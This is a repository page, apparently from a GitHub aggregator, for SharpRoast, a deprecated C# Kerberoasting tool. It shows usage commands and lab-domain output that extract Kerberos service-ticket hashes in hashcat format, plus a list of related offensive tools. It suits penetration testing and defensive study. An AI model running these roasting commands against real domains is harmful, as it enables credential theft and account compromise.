GhostPack/SharpRoast GhostPack/SharpRoast

  • Stars
    star
    248
  • Rank 158,804 (Top 4 %)
  • Language
    C#
  • License
    Other
  • Created almost 6 years ago
  • Updated over 5 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
GhostPack/SharpRoast
github

GhostPack

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

DEPRECATED SharpRoast is a C# port of various PowerView's Kerberoasting functionality.

This project has now been deprecated. Its functionality has been incorporated into Rubeus via the "kerberoast" action, which provides proper ASN.1 structure parsing.

SharpRoast

SharpRoast is a C# port of various PowerView's Kerberoasting functionality. The KerberosRequestorSecurityToken.GetRequest Method() method was contributed to PowerView by @machosec. The hashes are output in hashcat format.

@harmj0y is the primary author of this port.

SharpRoast is licensed under the BSD 3-Clause license.

Usage

Roast all users in the current domain:

C:\Temp>SharpRoast.exe all
SamAccountName         : harmj0y
DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : asdf/asdfasdf
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

SamAccountName         : sqlservice
DistinguishedName      : CN=SQL,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : MSSQLSvc/SQL.testlab.local
Hash                   : $krb5tgs$23$*$testlab.local$MSSQLSvc/SQL.testlab.local*$9994D1...

...

Roast a specific SPN:

C:\Temp>SharpRoast.exe "asdf/asdfasdf"
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

Roast a specific user in the current domain:

C:\Temp>SharpRoast.exe harmj0y
SamAccountName         : harmj0y
DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : asdf/asdfasdf
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

Roast users from a specified OU in the current domani:

C:\Temp>SharpRoast.exe "OU=TestingOU,DC=testlab,DC=local"
SamAccountName         : testuser2
DistinguishedName      : CN=testuser2,OU=TestingOU,DC=testlab,DC=local
ServicePrincipalName   : service/host
Hash                   : $krb5tgs$23$*$testlab.local$service/host*$08A6462...

Roast a specific specific SPN in another (trusted) domain:

C:\Temp\>SharpRoast.exe "MSSQLSvc/[email protected]"
Hash                   : $krb5tgs$23$*user$DOMAIN$MSSQLSvc/[email protected]*$9994D148...

Roast all users in another (trusted) domain:

C:\Temp>SharpRoast.exe "LDAP://DC=dev,DC=testlab,DC=local"
SamAccountName         : jason
DistinguishedName      : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local
ServicePrincipalName   : test/test
Hash                   : $krb5tgs$23$*$dev.testlab.local$test/test*$9129566...

Any of these commands also accept a [domain.com\user] [password] for to roast with explicit credentials. For example:

C:\Temp>SharpRoast.exe harmj0y "testlab.local\dfm" "Password123!"
SamAccountName         : harmj0y
DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : asdf/asdfasdf
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

Compile Instructions

We are not planning on releasing binaries for SharpRoast, so you will have to compile yourself :)

SharpRoast has been built against .NET 3.5 and is compatible with Visual Studio 2015 Community Edition. Simply open up the project .sln, choose "release", and build.

More Repositories

1

Rubeus

Trying to tame the three-headed dog.
C#
3,773
star
2

Seatbelt

Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
C#
3,443
star
3

Certify

Active Directory certificate abuse.
C#
1,348
star
4

SafetyKatz

SafetyKatz is a combination of slightly modified version of @gentilkiwi's Mimikatz project and @subtee's .NET PE Loader
C#
1,150
star
5

SharpUp

SharpUp is a C# port of various PowerUp functionality.
C#
1,114
star
6

SharpDPAPI

SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.
C#
1,046
star
7

KeeThief

Methods for attacking KeePass 2.X databases, including extracting of encryption key material from memory.
C#
895
star
8

SharpWMI

SharpWMI is a C# implementation of various WMI functionality.
C#
730
star
9

PSPKIAudit

PowerShell toolkit for AD CS auditing based on the PSPKI toolkit.
PowerShell
725
star
10

SharpDump

SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.
C#
644
star
11

ForgeCert

"Golden" certificates
C#
578
star
12

Koh

The Token Stealer
C#
465
star
13

Lockless

Lockless allows for the copying of locked files.
C#
217
star
14

RestrictedAdmin

Remotely enables Restricted Admin Mode
C#
202
star
15

DeepPass

Hunting for passwords with deep learning
Jupyter Notebook
175
star
16

Invoke-Evasion

PowerShell Obfuscation and Data Science
Jupyter Notebook
167
star
17

RAGnarok

A Nemesis powered Retrieval-Augmented Generation (RAG) chatbot proof-of-concept.
Python
27
star